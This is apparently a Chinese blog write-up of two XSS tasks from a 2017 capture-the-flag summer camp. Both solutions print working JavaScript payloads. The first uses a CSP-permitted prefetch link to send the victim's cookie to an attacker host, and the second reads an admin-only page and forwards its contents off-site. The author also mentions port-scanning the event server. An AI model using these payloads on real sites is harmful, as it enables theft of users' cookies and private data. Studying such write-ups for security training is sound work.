Chybeta

XMAN夏令营-2017-XSS-writeup

xss

Task1

1
http://202.112.51.217:33323/

Solution

查看csp头:

1
"default-src 'self'; script-src 'self' 'unsafe-inline';"

这里给出一个payload:

1
2
3
4
5
6
7
<script>
var head = document.getElementsByTagName("head")[0]
var n0t = document.createElement("link");
n0t.setAttribute("rel", "prefetch");
n0t.setAttribute("href", "http://yourvps/?" + document.cookie);
head.appendChild(n0t);
</script>

得到flag:

1
xman{BeVEn_CSP_you_G37_mY_C00K1e}

Task2

1
http://202.112.51.217:43425

Solution

没有csp头。但没办法直接得到cookie。

另外有一个flag.php,访问后如下:

1
only admin can see the flag!

我们先控制admin访问flag.php,之后再发送数据到我们vps上。

payload:

1
2
3
4
5
6
7
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://202.112.51.217:43425/flag.php", false);
xhr.send();
a=xhr.responseText;
location.href="http://yourvps/?a="+escape(a);
</script>

得到flag:

1
xman{OH_Y0u_G37_mY_secreT_F14G!}

后记

这些夏令营的题目是看到了一份wp,然后直接用nmap把ip的所有端口都扫了一遍:),然后扫出了一些web题:)

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:XMAN夏令营-2017-XSS-writeup

文章作者:chybeta

发布时间:2017年08月22日 - 18:08

最后更新:2017年08月22日 - 21:08

原始链接:http://chybeta.github.io/2017/08/22/XMAN夏令营-2017-XSS-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。